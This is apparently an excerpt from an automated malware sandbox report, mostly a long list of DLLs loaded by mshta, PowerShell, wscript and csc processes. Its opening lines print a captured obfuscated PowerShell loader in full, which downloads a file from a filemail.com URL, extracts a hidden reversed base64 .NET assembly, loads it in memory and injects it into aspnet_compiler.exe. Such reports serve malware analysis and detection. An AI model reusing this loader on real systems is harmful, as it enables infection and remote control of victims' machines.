hZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
